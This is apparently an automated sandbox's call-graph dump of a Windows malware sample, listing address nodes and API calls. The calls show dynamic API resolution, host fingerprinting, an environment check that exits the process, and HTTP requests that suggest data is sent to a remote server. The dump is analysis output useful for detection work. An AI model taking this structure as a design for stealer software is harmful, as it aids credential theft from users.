ae45c0 2 API calls 14267->14268 14269 ae371c 14268->14269 14270 ae45c0 2 API calls 14269->14270 14271 ae3735 14270->14271 14272 ae45c0 2 API calls 14271->14272 14273 ae374e 14272->14273 14274 ae45c0 2 API calls 14273->14274 14275 ae3767 14274->14275 14276 ae45c0 2 API calls 14275->14276 14277 ae3780 14276->14277 14278 ae45c0 2 API calls 14277->14278 14279 ae3799 14278->14279 14280 ae45c0 2 API calls 14279->14280 14281 ae37b2 14280->14281 14282 ae45c0 2 API calls 14281->14282 14283 ae37cb 14282->14283 14284 ae45c0 2 API calls 14283->14284 14285 ae37e4 14284->14285 14286 ae45c0 2 API calls 14285->14286 14287 ae37fd 14286->14287 14288 ae45c0 2 API calls 14287->14288 14289 ae3816 14288->14289 14290 ae45c0 2 API calls 14289->14290 14291 ae382f 14290->14291 14292 ae45c0 2 API calls 14291->14292 14293 ae3848 14292->14293 14294 ae45c0 2 API calls 14293->14294 14295 ae3861 14294->14295 14296 ae45c0 2 API calls 14295->14296 14297 ae387a 14296->14297 14298 ae45c0 2 API calls 14297->14298 14299 ae3893 14298->14299 14300 ae45c0 2 API calls 14299->14300 14301 ae38ac 14300->14301 14302 ae45c0 2 API calls 14301->14302 14303 ae38c5 14302->14303 14304 ae45c0 2 API calls 14303->14304 14305 ae38de 14304->14305 14306 ae45c0 2 API calls 14305->14306 14307 ae38f7 14306->14307 14308 ae45c0 2 API calls 14307->14308 14309 ae3910 14308->14309 14310 ae45c0 2 API calls 14309->14310 14311 ae3929 14310->14311 14312 ae45c0 2 API calls 14311->14312 14313 ae3942 14312->14313 14314 ae45c0 2 API calls 14313->14314 14315 ae395b 14314->14315 14316 ae45c0 2 API calls 14315->14316 14317 ae3974 14316->14317 14318 ae45c0 2 API calls 14317->14318 14319 ae398d 14318->14319 14320 ae45c0 2 API calls 14319->14320 14321 ae39a6 14320->14321 14322 ae45c0 2 API calls 14321->14322 14323 ae39bf 14322->14323 14324 ae45c0 2 API calls 14323->14324 14325 ae39d8 14324->14325 14326 ae45c0 2 API calls 14325->14326 14327 ae39f1 14326->14327 14328 ae45c0 2 API calls 14327->14328 14329 ae3a0a 14328->14329 14330 ae45c0 2 API calls 14329->14330 14331 ae3a23 14330->14331 14332 ae45c0 2 API calls 14331->14332 14333 ae3a3c 14332->14333 14334 ae45c0 2 API calls 14333->14334 14335 ae3a55 14334->14335 14336 ae45c0 2 API calls 14335->14336 14337 ae3a6e 14336->14337 14338 ae45c0 2 API calls 14337->14338 14339 ae3a87 14338->14339 14340 ae45c0 2 API calls 14339->14340 14341 ae3aa0 14340->14341 14342 ae45c0 2 API calls 14341->14342 14343 ae3ab9 14342->14343 14344 ae45c0 2 API calls 14343->14344 14345 ae3ad2 14344->14345 14346 ae45c0 2 API calls 14345->14346 14347 ae3aeb 14346->14347 14348 ae45c0 2 API calls 14347->14348 14349 ae3b04 14348->14349 14350 ae45c0 2 API calls 14349->14350 14351 ae3b1d 14350->14351 14352 ae45c0 2 API calls 14351->14352 14353 ae3b36 14352->14353 14354 ae45c0 2 API calls 14353->14354 14355 ae3b4f 14354->14355 14356 ae45c0 2 API calls 14355->14356 14357 ae3b68 14356->14357 14358 ae45c0 2 API calls 14357->14358 14359 ae3b81 14358->14359 14360 ae45c0 2 API calls 14359->14360 14361 ae3b9a 14360->14361 14362 ae45c0 2 API calls 14361->14362 14363 ae3bb3 14362->14363 14364 ae45c0 2 API calls 14363->14364 14365 ae3bcc 14364->14365 14366 ae45c0 2 API calls 14365->14366 14367 ae3be5 14366->14367 14368 ae45c0 2 API calls 14367->14368 14369 ae3bfe 14368->14369 14370 ae45c0 2 API calls 14369->14370 14371 ae3c17 14370->14371 14372 ae45c0 2 API calls 14371->14372 14373 ae3c30 14372->14373 14374 ae45c0 2 API calls 14373->14374 14375 ae3c49 14374->14375 14376 ae45c0 2 API calls 14375->14376 14377 ae3c62 14376->14377 14378 ae45c0 2 API calls 14377->14378 14379 ae3c7b 14378->14379 14380 ae45c0 2 API calls 14379->14380 14381 ae3c94 14380->14381 14382 ae45c0 2 API calls 14381->14382 14383 ae3cad 14382->14383 14384 ae45c0 2 API calls 14383->14384 14385 ae3cc6 14384->14385 14386 ae45c0 2 API calls 14385->14386 14387 ae3cdf 14386->14387 14388 ae45c0 2 API calls 14387->14388 14389 ae3cf8 14388->14389 14390 ae45c0 2 API calls 14389->14390 14391 ae3d11 14390->14391 14392 ae45c0 2 API calls 14391->14392 14393 ae3d2a 14392->14393 14394 ae45c0 2 API calls 14393->14394 14395 ae3d43 14394->14395 14396 ae45c0 2 API calls 14395->14396 14397 ae3d5c 14396->14397 14398 ae45c0 2 API calls 14397->14398 14399 ae3d75 14398->14399 14400 ae45c0 2 API calls 14399->14400 14401 ae3d8e 14400->14401 14402 ae45c0 2 API calls 14401->14402 14403 ae3da7 14402->14403 14404 ae45c0 2 API calls 14403->14404 14405 ae3dc0 14404->14405 14406 ae45c0 2 API calls 14405->14406 14407 ae3dd9 14406->14407 14408 ae45c0 2 API calls 14407->14408 14409 ae3df2 14408->14409 14410 ae45c0 2 API calls 14409->14410 14411 ae3e0b 14410->14411 14412 ae45c0 2 API calls 14411->14412 14413 ae3e24 14412->14413 14414 ae45c0 2 API calls 14413->14414 14415 ae3e3d 14414->14415 14416 ae45c0 2 API calls 14415->14416 14417 ae3e56 14416->14417 14418 ae45c0 2 API calls 14417->14418 14419 ae3e6f 14418->14419 14420 ae45c0 2 API calls 14419->14420 14421 ae3e88 14420->14421 14422 ae45c0 2 API calls 14421->14422 14423 ae3ea1 14422->14423 14424 ae45c0 2 API calls 14423->14424 14425 ae3eba 14424->14425 14426 ae45c0 2 API calls 14425->14426 14427 ae3ed3 14426->14427 14428 ae45c0 2 API calls 14427->14428 14429 ae3eec 14428->14429 14430 ae45c0 2 API calls 14429->14430 14431 ae3f05 14430->14431 14432 ae45c0 2 API calls 14431->14432 14433 ae3f1e 14432->14433 14434 ae45c0 2 API calls 14433->14434 14435 ae3f37 14434->14435 14436 ae45c0 2 API calls 14435->14436 14437 ae3f50 14436->14437 14438 ae45c0 2 API calls 14437->14438 14439 ae3f69 14438->14439 14440 ae45c0 2 API calls 14439->14440 14441 ae3f82 14440->14441 14442 ae45c0 2 API calls 14441->14442 14443 ae3f9b 14442->14443 14444 ae45c0 2 API calls 14443->14444 14445 ae3fb4 14444->14445 14446 ae45c0 2 API calls 14445->14446 14447 ae3fcd 14446->14447 14448 ae45c0 2 API calls 14447->14448 14449 ae3fe6 14448->14449 14450 ae45c0 2 API calls 14449->14450 14451 ae3fff 14450->14451 14452 ae45c0 2 API calls 14451->14452 14453 ae4018 14452->14453 14454 ae45c0 2 API calls 14453->14454 14455 ae4031 14454->14455 14456 ae45c0 2 API calls 14455->14456 14457 ae404a 14456->14457 14458 ae45c0 2 API calls 14457->14458 14459 ae4063 14458->14459 14460 ae45c0 2 API calls 14459->14460 14461 ae407c 14460->14461 14462 ae45c0 2 API calls 14461->14462 14463 ae4095 14462->14463 14464 ae45c0 2 API calls 14463->14464 14465 ae40ae 14464->14465 14466 ae45c0 2 API calls 14465->14466 14467 ae40c7 14466->14467 14468 ae45c0 2 API calls 14467->14468 14469 ae40e0 14468->14469 14470 ae45c0 2 API calls 14469->14470 14471 ae40f9 14470->14471 14472 ae45c0 2 API calls 14471->14472 14473 ae4112 14472->14473 14474 ae45c0 2 API calls 14473->14474 14475 ae412b 14474->14475 14476 ae45c0 2 API calls 14475->14476 14477 ae4144 14476->14477 14478 ae45c0 2 API calls 14477->14478 14479 ae415d 14478->14479 14480 ae45c0 2 API calls 14479->14480 14481 ae4176 14480->14481 14482 ae45c0 2 API calls 14481->14482 14483 ae418f 14482->14483 14484 ae45c0 2 API calls 14483->14484 14485 ae41a8 14484->14485 14486 ae45c0 2 API calls 14485->14486 14487 ae41c1 14486->14487 14488 ae45c0 2 API calls 14487->14488 14489 ae41da 14488->14489 14490 ae45c0 2 API calls 14489->14490 14491 ae41f3 14490->14491 14492 ae45c0 2 API calls 14491->14492 14493 ae420c 14492->14493 14494 ae45c0 2 API calls 14493->14494 14495 ae4225 14494->14495 14496 ae45c0 2 API calls 14495->14496 14497 ae423e 14496->14497 14498 ae45c0 2 API calls 14497->14498 14499 ae4257 14498->14499 14500 ae45c0 2 API calls 14499->14500 14501 ae4270 14500->14501 14502 ae45c0 2 API calls 14501->14502 14503 ae4289 14502->14503 14504 ae45c0 2 API calls 14503->14504 14505 ae42a2 14504->14505 14506 ae45c0 2 API calls 14505->14506 14507 ae42bb 14506->14507 14508 ae45c0 2 API calls 14507->14508 14509 ae42d4 14508->14509 14510 ae45c0 2 API calls 14509->14510 14511 ae42ed 14510->14511 14512 ae45c0 2 API calls 14511->14512 14513 ae4306 14512->14513 14514 ae45c0 2 API calls 14513->14514 14515 ae431f 14514->14515 14516 ae45c0 2 API calls 14515->14516 14517 ae4338 14516->14517 14518 ae45c0 2 API calls 14517->14518 14519 ae4351 14518->14519 14520 ae45c0 2 API calls 14519->14520 14521 ae436a 14520->14521 14522 ae45c0 2 API calls 14521->14522 14523 ae4383 14522->14523 14524 ae45c0 2 API calls 14523->14524 14525 ae439c 14524->14525 14526 ae45c0 2 API calls 14525->14526 14527 ae43b5 14526->14527 14528 ae45c0 2 API calls 14527->14528 14529 ae43ce 14528->14529 14530 ae45c0 2 API calls 14529->14530 14531 ae43e7 14530->14531 14532 ae45c0 2 API calls 14531->14532 14533 ae4400 14532->14533 14534 ae45c0 2 API calls 14533->14534 14535 ae4419 14534->14535 14536 ae45c0 2 API calls 14535->14536 14537 ae4432 14536->14537 14538 ae45c0 2 API calls 14537->14538 14539 ae444b 14538->14539 14540 ae45c0 2 API calls 14539->14540 14541 ae4464 14540->14541 14542 ae45c0 2 API calls 14541->14542 14543 ae447d 14542->14543 14544 ae45c0 2 API calls 14543->14544 14545 ae4496 14544->14545 14546 ae45c0 2 API calls 14545->14546 14547 ae44af 14546->14547 14548 ae45c0 2 API calls 14547->14548 14549 ae44c8 14548->14549 14550 ae45c0 2 API calls 14549->14550 14551 ae44e1 14550->14551 14552 ae45c0 2 API calls 14551->14552 14553 ae44fa 14552->14553 14554 ae45c0 2 API calls 14553->14554 14555 ae4513 14554->14555 14556 ae45c0 2 API calls 14555->14556 14557 ae452c 14556->14557 14558 ae45c0 2 API calls 14557->14558 14559 ae4545 14558->14559 14560 ae45c0 2 API calls 14559->14560 14561 ae455e 14560->14561 14562 ae45c0 2 API calls 14561->14562 14563 ae4577 14562->14563 14564 ae45c0 2 API calls 14563->14564 14565 ae4590 14564->14565 14566 ae45c0 2 API calls 14565->14566 14567 ae45a9 14566->14567 14568 af9c10 14567->14568 14569 afa036 8 API calls 14568->14569 14570 af9c20 43 API calls 14568->14570 14571 afa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14569->14571 14572 afa146 14569->14572 14570->14569 14571->14572 14573 afa216 14572->14573 14574 afa153 8 API calls 14572->14574 14575 afa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14573->14575 14576 afa298 14573->14576 14574->14573 14575->14576 14577 afa337 14576->14577 14578 afa2a5 6 API calls 14576->14578 14579 afa41f 14577->14579 14580 afa344 9 API calls 14577->14580 14578->14577 14581 afa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14579->14581 14582 afa4a2 14579->14582 14580->14579 14581->14582 14583 afa4dc 14582->14583 14584 afa4ab GetProcAddress GetProcAddress 14582->14584 14585 afa515 14583->14585 14586 afa4e5 GetProcAddress GetProcAddress 14583->14586 14584->14583 14587 afa612 14585->14587 14588 afa522 10 API calls 14585->14588 14586->14585 14589 afa67d 14587->14589 14590 afa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14587->14590 14588->14587 14591 afa69e 14589->14591 14592 afa686 GetProcAddress 14589->14592 14590->14589 14593 af5ca3 14591->14593 14594 afa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14591->14594 14592->14591 14595 ae1590 14593->14595 14594->14593 15715 ae1670 14595->15715 14598 afa7a0 lstrcpy 14599 ae15b5 14598->14599 14600 afa7a0 lstrcpy 14599->14600 14601 ae15c7 14600->14601 14602 afa7a0 lstrcpy 14601->14602 14603 ae15d9 14602->14603 14604 afa7a0 lstrcpy 14603->14604 14605 ae1663 14604->14605 14606 af5510 14605->14606 14607 af5521 14606->14607 14608 afa820 2 API calls 14607->14608 14609 af552e 14608->14609 14610 afa820 2 API calls 14609->14610 14611 af553b 14610->14611 14612 afa820 2 API calls 14611->14612 14613 af5548 14612->14613 14614 afa740 lstrcpy 14613->14614 14615 af5555 14614->14615 14616 afa740 lstrcpy 14615->14616 14617 af5562 14616->14617 14618 afa740 lstrcpy 14617->14618 14619 af556f 14618->14619 14620 afa740 lstrcpy 14619->14620 14625 af557c 14620->14625 14621 afa740 lstrcpy 14621->14625 14622 af5643 StrCmpCA 14622->14625 14623 af56a0 StrCmpCA 14624 af57dc 14623->14624 14623->14625 14626 afa8a0 lstrcpy 14624->14626 14625->14621 14625->14622 14625->14623 14629 afa820 lstrlen lstrcpy 14625->14629 14631 af5856 StrCmpCA 14625->14631 14632 af51f0 20 API calls 14625->14632 14641 af5a0b StrCmpCA 14625->14641 14642 af52c0 25 API calls 14625->14642 14653 afa8a0 lstrcpy 14625->14653 14654 af578a StrCmpCA 14625->14654 14657 afa7a0 lstrcpy 14625->14657 14658 af593f StrCmpCA 14625->14658 14659 ae1590 lstrcpy 14625->14659 14627 af57e8 14626->14627 14628 afa820 2 API calls 14627->14628 14630 af57f6 14628->14630 14629->14625 14633 afa820 2 API calls 14630->14633 14631->14625 14634 af5991 14631->14634 14632->14625 14636 af5805 14633->14636 14635 afa8a0 lstrcpy 14634->14635 14637 af599d 14635->14637 14638 ae1670 lstrcpy 14636->14638 14639 afa820 2 API calls 14637->14639 14660 af5811 14638->14660 14640 af59ab 14639->14640 14643 afa820 2 API calls 14640->14643 14644 af5a28 14641->14644 14645 af5a16 Sleep 14641->14645 14642->14625 14646 af59ba 14643->14646 14647 afa8a0 lstrcpy 14644->14647 14645->14625 14648 ae1670 lstrcpy 14646->14648 14649 af5a34 14647->14649 14648->14660 14650 afa820 2 API calls 14649->14650 14651 af5a43 14650->14651 14652 afa820 2 API calls 14651->14652 14655 af5a52 14652->14655 14653->14625 14654->14625 14656 ae1670 lstrcpy 14655->14656 14656->14660 14657->14625 14658->14625 14659->14625 14660->13713 14662 af754c 14661->14662 14663 af7553 GetVolumeInformationA 14661->14663 14662->14663 14664 af7591 14663->14664 14665 af75fc GetProcessHeap RtlAllocateHeap 14664->14665 14666 af7619 14665->14666 14667 af7628 wsprintfA 14665->14667 14668 afa740 lstrcpy 14666->14668 14669 afa740 lstrcpy 14667->14669 14670 af5da7 14668->14670 14669->14670 14670->13734 14672 afa7a0 lstrcpy 14671->14672 14673 ae4899 14672->14673 15724 ae47b0 14673->15724 14675 ae48a5 14676 afa740 lstrcpy 14675->14676 14677 ae48d7 14676->14677 14678 afa740 lstrcpy 14677->14678 14679 ae48e4 14678->14679 14680 afa740 lstrcpy 14679->14680 14681 ae48f1 14680->14681 14682 afa740 lstrcpy 14681->14682 14683 ae48fe 14682->14683 14684 afa740 lstrcpy 14683->14684 14685 ae490b InternetOpenA StrCmpCA 14684->14685 14686 ae4944 14685->14686 14687 ae4ecb InternetCloseHandle 14686->14687 14688 ae4955 14686->14688 14690 ae4ee8 14687->14690 15735 af8b60 14688->15735 15730 ae9ac0 CryptStringToBinaryA 14690->15730 14691 ae4963 15743 afa920 14691->15743 14694 ae4976 14696 afa8a0 lstrcpy 14694->14696 14700 ae497f 14696->14700 14697 afa820 2 API calls 14698 ae4f05 14697->14698 14699 afa9b0 4 API calls 14698->14699 14701 ae4f1b 14699->14701 14705 afa9b0 4 API calls 14700->14705 14703 afa8a0 lstrcpy 14701->14703 14702 ae4f27 codecvt 14704 afa7a0 lstrcpy 14702->14704 14703->14702 14717 ae4f57 14704->14717 14706 ae49a9 14705->14706 14707 afa8a0 lstrcpy 14706->14707 14708 ae49b2 14707->14708 14709 afa9b0 4 API calls 14708->14709 14710 ae49d1 14709->14710 14711 afa8a0 lstrcpy 14710->14711 14712 ae49da 14711->14712 14713 afa920 3 API calls 14712->14713 14714 ae49f8 14713->14714 14715 afa8a0 lstrcpy 14714->14715 14716 ae4a01 14715->14716 14718 afa9b0 4 API calls 14716->14718 14717->13737 14719 ae4a20 14718->14719 14720 afa8a0 lstrcpy 14719->14720 14721 ae4a29 14720->14721 14722 afa9b0 4 API calls 14721->14722 14723 ae4a48 14722->14723 14724 afa8a0 lstrcpy 14723->14724 14725 ae4a51 14724->14725 14726 afa9b0 4 API calls 14725->14726 14727 ae4a7d 14726->14727 14728 afa920 3 API calls 14727->14728 14729 ae4a84 14728->14729 14730 afa8a0 lstrcpy 14729->14730 14731 ae4a8d 14730->14731 14732 ae4aa3 InternetConnectA 14731->14732 14732->14687 14733 ae4ad3 HttpOpenRequestA 14732->14733 14735 ae4ebe InternetCloseHandle 14733->14735 14736 ae4b28 14733->14736 14735->14687 14737 afa9b0 4 API calls 14736->14737 14738 ae4b3c 14737->14738 14739 afa8a0 lstrcpy 14738->14739 14740 ae4b45 14739->14740 14741 afa920 3 API calls 14740->14741 14742 ae4b63 14741->14742 14743 afa8a0 lstrcpy 14742->14743 14744 ae4b6c 14743->14744 14745 afa9b0 4 API calls 14744->14745 14746 ae4b8b 14745->14746 14747 afa8a0 lstrcpy 14746->14747 14748 ae4b94 14747->14748 14749 afa9b0 4 API calls 14748->14749 14750 ae4bb5 14749->14750 14751 afa8a0 lstrcpy 14750->14751 14752 ae4bbe 14751->14752 14753 afa9b0 4 API calls 14752->14753 14754 ae4bde 14753->14754 14755 afa8a0 lstrcpy 14754->14755 14756 ae4be7 14755->14756 14757 afa9b0 4 API calls 14756->14757 14758 ae4c06 14757->14758 14759 afa8a0 lstrcpy 14758->14759 14760 ae4c0f 14759->14760 14761 afa920 3 API calls 14760->14761 14762 ae4c2d 14761->14762 14763 afa8a0 lstrcpy 14762->14763 14764 ae4c36 14763->14764 14765 afa9b0 4 API calls 14764->14765 14766 ae4c55 14765->14766 14767 afa8a0 lstrcpy 14766->14767 14768 ae4c5e 14767->14768 14769 afa9b0 4 API calls 14768->14769 14770 ae4c7d 14769->14770 14771 afa8a0 lstrcpy 14770->14771 14772 ae4c86 14771->14772 14773 afa920 3 API calls 14772->14773 14774 ae4ca4 14773->14774 14775 afa8a0 lstrcpy 14774->14775 14776 ae4cad 14775->14776 14777 afa9b0 4 API calls 14776->14777 14778 ae4ccc 14777->14778 14779 afa8a0 lstrcpy 14778->14779 14780 ae4cd5 14779->14780 14781 afa9b0 4 API calls 14780->14781 14782 ae4cf6 14781->14782 14783 afa8a0 lstrcpy 14782->14783 14784 ae4cff 14783->14784 14785 afa9b0 4 API calls 14784->14785 14786 ae4d1f 14785->14786 14787 afa8a0 lstrcpy 14786->14787 14788 ae4d28 14787->14788 14789 afa9b0 4 API calls 14788->14789 14790 ae4d47 14789->14790 14791 afa8a0 lstrcpy 14790->14791 14792 ae4d50 14791->14792 14793 afa920 3 API calls 14792->14793 14794 ae4d6e 14793->14794 14795 afa8a0 lstrcpy 14794->14795 14796 ae4d77 14795->14796 14797 afa740 lstrcpy 14796->14797 14798 ae4d92 14797->14798 14799 afa920 3 API calls 14798->14799 14800 ae4db3 14799->14800 14801 afa920 3 API calls 14800->14801 14802 ae4dba 14801->14802 14803 afa8a0 lstrcpy 14802->14803 14804 ae4dc6 14803->14804 14805 ae4de7 lstrlen 14804->14805 14806 ae4dfa 14805->14806 14807 ae4e03 lstrlen 14806->14807 15749 afaad0 14807->15749 14809 ae4e13 HttpSendRequestA 14810 ae4e32 InternetReadFile 14809->14810 14811 ae4e67 InternetCloseHandle 14810->14811 14816 ae4e5e 14810->14816 14814 afa800 14811->14814 14813 afa9b0 4 API calls 14813->14816 14814->14735 14815 afa8a0 lstrcpy 14815->14816 14816->14810 14816->14811 14816->14813 14816->14815 15751 afaad0 14817->15751 14819 af17c4 StrCmpCA 14820 af17cf ExitProcess 14819->14820 14824 af17d7 14819->14824 14821 af19c2 14821->13739 14822 af18cf StrCmpCA 14822->14824 14823 af18ad StrCmpCA 14823->14824 14824->14821 14824->14822 14824->14823 14825 af187f StrCmpCA 14824->14825 14826 af185d StrCmpCA 14824->14826 14827 af1913 StrCmpCA 14824->14827 14828 af1932 StrCmpCA 14824->14828 14829 af18f1 StrCmpCA 14824->14829 14830 af1951 StrCmpCA 14824->14830 14831 af1970 StrCmpCA 14824->14831 14832 afa820 lstrlen lstrcpy 14824->14832 14825->14824 14826->14824 14827->14824 14828->14824 14829->14824 14830->14824 14831->14824 14832->14824 14834 afa7a0 lstrcpy 14833->14834 14835 ae5979 14834->14835 14836 ae47b0 2 API calls 14835->14836 14837 ae5985 14836->14837 14838 afa740 lstrcpy 14837->14838 14839 ae59ba 14838->14839 14840 afa740 lstrcpy 14839->14840 14841 ae59c7 14840->14841 14842 afa740 lstrcpy 14841->14842 14843 ae59d4 14842->14843 14844 afa740 lstrcpy 14843->14844 14845 ae59e1 14844->14845 14846 afa740 lstrcpy 14845->14846 14847 ae59ee InternetOpenA StrCmpCA 14846->14847 14848 ae5a1d 14847->14848 14849 ae5fc3 InternetCloseHandle 14848->14849 14850 af8b60 3 API calls 14848->14850 14851 ae5fe0 14849->14851 14852 ae5a3c 14850->14852 14854 ae9ac0 4 API calls 14851->14854 14853 afa920 3 API calls 14852->14853 14855 ae5a4f 14853->14855 14856 ae5fe6 14854->14856 14857 afa8a0 lstrcpy 14855->14857 14858 afa820 2 API calls 14856->14858 14861 ae601f codecvt 14856->14861 14862 ae5a58 14857->14862 14859 ae5ffd 14858->14859 14860 afa9b0 4 API calls 14859->14860 14863 ae6013 14860->14863 14865 afa7a0 lstrcpy 14861->14865 14866 afa9b0 4 API calls 14862->14866 14864 afa8a0 lstrcpy 14863->14864 14864->14861 14874 ae604f 14865->14874 14867 ae5a82 14866->14867 14868 afa8a0 lstrcpy 14867->14868 14869 ae5a8b 14868->14869 14870 afa9b0 4 API calls 14869->14870 14871 ae5aaa 14870->14871 14872 afa8a0 lstrcpy 14871->14872 14873 ae5ab3 14872->14873 14875 afa920 3 API calls 14873->14875 14874->13745 14876 ae5ad1 14875->14876 14877 afa8a0 lstrcpy 14876->14877 14878 ae5ada 14877->14878 14879 afa9b0 4 API calls 14878->14879 14880 ae5af9 14879->14880 14881 afa8a0 lstrcpy 14880->14881 14882 ae5b02 14881->14882 14883 afa9b0 4 API calls 14882->14883 14884 ae5b21 14883->14884 14885 afa8a0 lstrcpy 14884->14885 14886 ae5b2a 14885->14886 14887 afa9b0 4 API calls 14886->14887 14888 ae5b56 14887->14888 14889 afa920 3 API calls 14888->14889 14890 ae5b5d 14889->14890 14891 afa8a0 lstrcpy 14890->14891 14892 ae5b66 14891->14892 14893 ae5b7c InternetConnectA 14892->14893 14893->14849 14894 ae5bac HttpOpenRequestA 14893->14894 14896 ae5c0b 14894->14896 14897 ae5fb6 InternetCloseHandle 14894->14897 14898 afa9b0 4 API calls 14896->14898 14897->14849 14899 ae5c1f 14898->14899 14900 afa8a0 lstrcpy 14899->14900 14901 ae5c28 14900->14901 14902 afa920 3 API calls 14901->14902 14903 ae5c46 14902->14903 14904 afa8a0 lstrcpy 14903->14904 14905 ae5c4f 14904->14905 14906 afa9b0 4 API calls 14905->14906 14907 ae5c6e 14906->14907 14908 afa8a0 lstrcpy 14907->14908 14909 ae5c77 14908->14909 14910 afa9b0 4 API calls 14909->14910 14911 ae5c98 14910->14911 14912 afa8a0 lstrcpy 14911->14912 14913 ae5ca1 14912->14913 14914 afa9b0 4 API calls 14913->14914 14915 ae5cc1 14914->14915 14916 afa8a0 lstrcpy 14915->14916 14917 ae5cca 14916->14917 14918 afa9b0 4 API calls 14917->14918 14919 ae5ce9 14918->14919 14920 afa8a0 lstrcpy 14919->14920 14921 ae5cf2 14920->14921 14922 afa920 3 API calls 14921->14922 14923 ae5d10 14922->14923 14924 afa8a0 lstrcpy 14923->14924 14925 ae5d19 14924->14925 14926 afa9b0 4 API calls 14925->14926 14927 ae5d38 14926->14927 14928 afa8a0 lstrcpy 14927->14928 14929 ae5d41 14928->14929 14930 afa9b0 4 API calls 14929->14930 14931 ae5d60 14930->14931 14932 afa8a0 lstrcpy 14931->14932 14933 ae5d69 14932->14933 14934 afa920 3 API calls 14933->14934 14935 ae5d87 14934->14935 14936 afa8a0 lstrcpy 14935->14936 14937 ae5d90 14936->14937 14938 afa9b0 4 API calls 14937->14938 14939 ae5daf 14938->14939 14940 afa8a0 lstrcpy 14939->14940 14941 ae5db8 14940->14941 14942 afa9b0 4 API calls 14941->14942 14943 ae5dd9 14942->14943 14944 afa8a0 lstrcpy 14943->14944 14945 ae5de2 14944->14945 14946 afa9b0 4 API calls 14945->14946 14947 ae5e02 14946->14947 14948 afa8a0 lstrcpy 14947->14948 14949 ae5e0b 14948->14949 14950 afa9b0 4 API calls 14949->14950 14951 ae5e2a 14950->14951 14952 afa8a0 lstrcpy 14951->14952 14953 ae5e33 14952->14953 14954 afa920 3 API calls 14953->14954 14955 ae5e54 14954->14955 14956 afa8a0 lstrcpy 14955->14956 14957 ae5e5d 14956->14957 14958 ae5e70 lstrlen 14957->14958 15752 afaad0 14958->15752 14960 ae5e81 lstrlen GetProcessHeap RtlAllocateHeap 15753 afaad0 14960->15753 14962 ae5eae lstrlen 14963 ae5ebe 14962->14963 14964 ae5ed7 lstrlen 14963->14964 14965 ae5ee7 14964->14965 14966 ae5ef0 lstrlen 14965->14966 14967 ae5f04 14966->14967 14968 ae5f1a lstrlen 14967->14968 15754 afaad0 14968->15754 14970 ae5f2a HttpSendRequestA 14971 ae5f35 InternetReadFile 14970->14971 14972 ae5f6a InternetCloseHandle 14971->14972 14976 ae5f61 14971->14976 14972->14897 14974 afa9b0 4 API calls 14974->14976 14975 afa8a0 lstrcpy 14975->14976 14976->14971 14976->14972 14976->14974 14976->14975 14979 af1077 14977->14979 14978 af1151 14978->13747 14979->14978 14980 afa820 lstrlen lstrcpy 14979->14980 14980->14979 14986 af0db7 14981->14986 14982 af0f17 14982->13755 14983 af0e27 StrCmpCA 14983->14986 14984 af0e67 StrCmpCA 14984->14986 14985 af0ea4 StrCmpCA 14985->14986 14986->14982 14986->14983 14986->14984 14986->14985 14987 afa820 lstrlen lstrcpy 14986->14987 14987->14986 14991 af0f67 14988->14991 14989 af1044 14989->13763 14990 af0fb2 StrCmpCA 14990->14991 14991->14989 14991->14990 14992 afa820 lstrlen lstrcpy 14991->14992 14992->14991 14994 afa740 lstrcpy 14993->14994 14995 af1a26 14994->14995 14996 afa9b0 4 API calls 14995->14996 14997 af1a37 14996->14997 14998 afa8a0 lstrcpy 14997->14998 14999 af1a40 14998->14999 15000 afa9b0 4 API calls 14999->15000 15001 af1a5b 15000->15001 15002 afa8a0 lstrcpy 15001->15002 15003 af1a64 15002->15003 15004 afa9b0 4 API calls 15003->15004 15005 af1a7d 15004->15005 15006 afa8a0 lstrcpy 15005->15006 15007 af1a86 15006->15007 15008 afa9b0 4 API calls 15007->15008 15009 af1aa1 15008->15009 15010 afa8a0 lstrcpy 15009->15010 15011 af1aaa 15010->15011 15012 afa9b0 4 API calls 15011->15012 15013 af1ac3 15012->15013 15014 afa8a0 lstrcpy 15013->15014 15015 af1acc 15014->15015 15016 afa9b0 4 API calls 15015->15016 15017 af1ae7 15016->15017 15018 afa8a0 lstrcpy 15017->15018 15019 af1af0 15018->15019 15020 afa9b0 4 API calls 15019->15020 15021 af1b09 15020->15021 15022 afa8a0 lstrcpy 15021->15022 15023 af1b12 15022->15023 15024 afa9b0 4 API calls 15023->15024 15025 af1b2d 15024->15025 15026 afa8a0 lstrcpy 15025->15026 15027 af1b36 15026->15027 15028 afa9b0 4 API calls 15027->15028 15029 af1b4f 15028->15029 15030 afa8a0 lstrcpy 15029->15030 15031 af1b58 15030->15031 15032 afa9b0 4 API calls 15031->15032 15033 af1b76 15032->15033 15034 afa8a0 lstrcpy 15033->15034 15035 af1b7f 15034->15035 15036 af7500 6 API calls 15035->15036 15037 af1b96 15036->15037 15038 afa920 3 API calls 15037->15038 15039 af1ba9 15038->15039 15040 afa8a0 lstrcpy 15039->15040 15041 af1bb2 15040->15041 15042 afa9b0 4 API calls 15041->15042 15043 af1bdc 15042->15043 15044 afa8a0 lstrcpy 15043->15044 15045 af1be5 15044->15045 15046 afa9b0 4 API calls 15045->15046 15047 af1c05 15046->15047 15048 afa8a0 lstrcpy 15047->15048 15049 af1c0e 15048->15049 15755 af7690 GetProcessHeap RtlAllocateHeap 15049->15755 15052 afa9b0 4 API calls 15053 af1c2e 15052->15053 15054 afa8a0 lstrcpy 15053->15054 15055 af1c37 15054->15055 15056 afa9b0 4 API calls 15055->15056 15057 af1c56 15056->15057 15058 afa8a0 lstrcpy 15057->15058 15059 af1c5f 15058->15059 15060 afa9b0 4 API calls 15059->15060 15061 af1c80 15060->15061 15062 afa8a0 lstrcpy 15061->15062 15063 af1c89 15062->15063 15762 af77c0 GetCurrentProcess IsWow64Process 15063->15762 15066 afa9b0 4 API calls 15067 af1ca9 15066->15067 15068 afa8a0 lstrcpy 15067->15068 15069 af1cb2 15068->15069 15070 afa9b0 4 API calls 15069->15070 15071 af1cd1 15070->15071 15072 afa8a0 lstrcpy 15071->15072 15073 af1cda 15072->15073 15074 afa9b0 4 API calls 15073->15074 15075 af1cfb 15074->15075 15076 afa8a0 lstrcpy 15075->15076 15077 af1d04 15076->15077 15078 af7850 3 API calls 15077->15078 15079 af1d14 15078->15079 15080 afa9b0 4 API calls 15079->15080 15081 af1d24 